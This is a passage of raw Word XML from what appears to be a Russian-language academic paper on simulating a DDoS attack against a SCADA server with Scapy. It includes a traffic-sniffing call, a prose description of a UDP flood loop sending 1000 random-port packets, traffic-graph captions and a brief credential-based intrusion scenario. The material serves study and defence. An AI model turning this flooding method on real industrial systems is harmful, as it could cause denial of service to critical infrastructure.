          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sniff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>prn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>simulate_defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4934C089" w14:textId="29132BE9" w:rsidR="00153D51" w:rsidRDefault="00153D51" w:rsidP="00520A08">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Фрагмент кода</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF35DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Симуляция DDoS-атаки с анализом трафика и защитой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB12B4" w14:textId="0E706117" w:rsidR="00153D51" w:rsidRDefault="00153D51" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь мы формируем </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-пакет с указанным </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (адрес получателя) и </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-сегментом. Поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sport</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RandShort</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> задаёт случайный исходящий порт (имитация множества разных источников). Поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавляет 1024 байта произвольных данных в пакет. Цикл отправляет 1000 таких пакетов без паузы, что эквивалентно примитивной </w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00153D51">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-нагрузке. При запуске этого кода в консоли будет видно начало и конец атаки. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16548734" w14:textId="5EBBEDE7" w:rsidR="001D2B1D" w:rsidRDefault="00772B53" w:rsidP="001D2B1D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="427B730F" wp14:editId="19A844C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1755747</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1872880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="209550" cy="147955"/>
            <wp:effectExtent l="38100" t="57150" r="0" b="61595"/>
            <wp:wrapNone/>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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="30476" t="64765" r="48571" b="22034"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="8371028">
                      <a:off x="0" y="0"/>
                      <a:ext cx="209550" cy="147955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001036E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43D387DE" wp14:editId="2932397A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3928745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>3081655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="168910" cy="98425"/>
                <wp:effectExtent l="0" t="19050" r="40640" b="34925"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Стрелка: вправо 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="168910" cy="98425"/>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F2D99F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Стрелка: вправо 26" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:309.35pt;margin-top:242.65pt;width:13.3pt;height:7.75pt;z-index:25167155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" adj="15307" fillcolor="#ed7d31 [3205]" strokecolor="#823b0b [1605]" strokeweight="1pt">
                <w10:wrap anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D2B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78F787DD" wp14:editId="46810D20">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3653155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2539365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="273685" cy="1374140"/>
                <wp:effectExtent l="0" t="0" r="50165" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="25" name="Правая фигурная скобка 25"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="273685" cy="1374140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 75124"/>
                            <a:gd name="adj2" fmla="val 42795"/>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514F451"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Правая фигурная скобка 25" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:287.65pt;margin-top:199.95pt;width:21.55pt;height:108.2pt;z-index:2516705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" adj="3232,9244" strokecolor="#ed7d31 [3205]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D2B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="534ECF56" wp14:editId="2D3E9130">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1871345</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1996440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="402590" cy="1497330"/>
                <wp:effectExtent l="0" t="0" r="16510" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="22" name="Соединитель: изогнутый 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="402590" cy="1497330"/>
                        </a:xfrm>
                        <a:prstGeom prst="curvedConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 31930"/>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C48B0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Соединитель: изогнутый 22" o:spid="_x0000_s1026" type="#_x0000_t38" style="position:absolute;margin-left:147.35pt;margin-top:157.2pt;width:31.7pt;height:117.9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" adj="6897" strokecolor="#a5a5a5 [3206]">
                <v:stroke dashstyle="dash"/>
                <w10:wrap anchory="page"/>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D2B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E678496" wp14:editId="4891F577">
            <wp:extent cx="5497008" cy="4270550"/>
            <wp:effectExtent l="0" t="0" r="889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19453" cy="4287987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E92BD2" w14:textId="2D79F075" w:rsidR="00F13368" w:rsidRDefault="00F13368" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ри</w:t>
      </w:r>
      <w:r w:rsidR="006116F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">с.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1027C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2626">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Архитектура моделирования DDoS-атаки с использованием Scapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6447C865" w14:textId="77777777" w:rsidR="001036E2" w:rsidRDefault="00F13368" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Для наглядности можно отследить загрузку CPU/сети или лог-файлы SCADA-сервера, чтобы увидеть эффект</w:t>
      </w:r>
      <w:r w:rsidR="001036E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001036E2" w:rsidRPr="00F43C3A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для моделирования атаки злоумышленника на SCADA-систему рассматриваем попытку несанкционированного доступа к серверу управления или изменения его конфигурации. Атакующий может использовать уязвимости протоколов (многие промышленные протоколы, такие как Modbus, не поддерживают шифрование и аутентификацию) или пытаться подобрать пароли и эксплуатировать уязвимости программного обеспечения. Для целей симуляции мы упростим сценарий: предположим, что атакующий пытается подключиться к SCADA-серверу по сети, используя известные учетные данные или бэкдор. Мы реализуем это как проверку логина и пароля в системе. Если проверка пройдена (атака успешна), узел SCADA будет помечен как компрометированный.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A431085" w14:textId="30DFC174" w:rsidR="00F13368" w:rsidRPr="00FE2CBB" w:rsidRDefault="00F13368" w:rsidP="00520A08">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06822220" w14:textId="77777777" w:rsidR="001036E2" w:rsidRDefault="00F13368" w:rsidP="001036E2">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38789D18" wp14:editId="062F6B14">
            <wp:extent cx="5064760" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="254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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2607" t="6725" r="8469" b="1519"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5064760" cy="3924300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D4CB7" w14:textId="24B2B6C2" w:rsidR="00F13368" w:rsidRDefault="00F13368" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13368">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="00346970" w:rsidRPr="00346970">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1027C">
        <w:rPr>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00346970" w:rsidRPr="00DE76DE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1027C">
        <w:rPr>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13368">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">График нагрузки трафика на </w:t>
      </w:r>
      <w:r>
        <w:t>SCADA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13368">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> сервер во время атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026ACBA8" w14:textId="77777777" w:rsidR="001036E2" w:rsidRPr="00F13368" w:rsidRDefault="001036E2" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322918A1" w14:textId="2EC092F7" w:rsidR="00153D51" w:rsidRPr="001036E2" w:rsidRDefault="00F13368" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504992">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="az-Latn-AZ"/>
        </w:rPr>
        <w:t>На графике видно, как до атаки уровень трафика невысокий и стабилен, а с момента начала DDoS (обозначен красной линией) резко возрастает нагрузка. Такой всплеск может привести к отказу в обслуживании SCADA-сервера.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="6A6C8981" w14:textId="76FFBBA4" w:rsidR="004D7F00" w:rsidRPr="00507B97" w:rsidRDefault="00341F7F" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
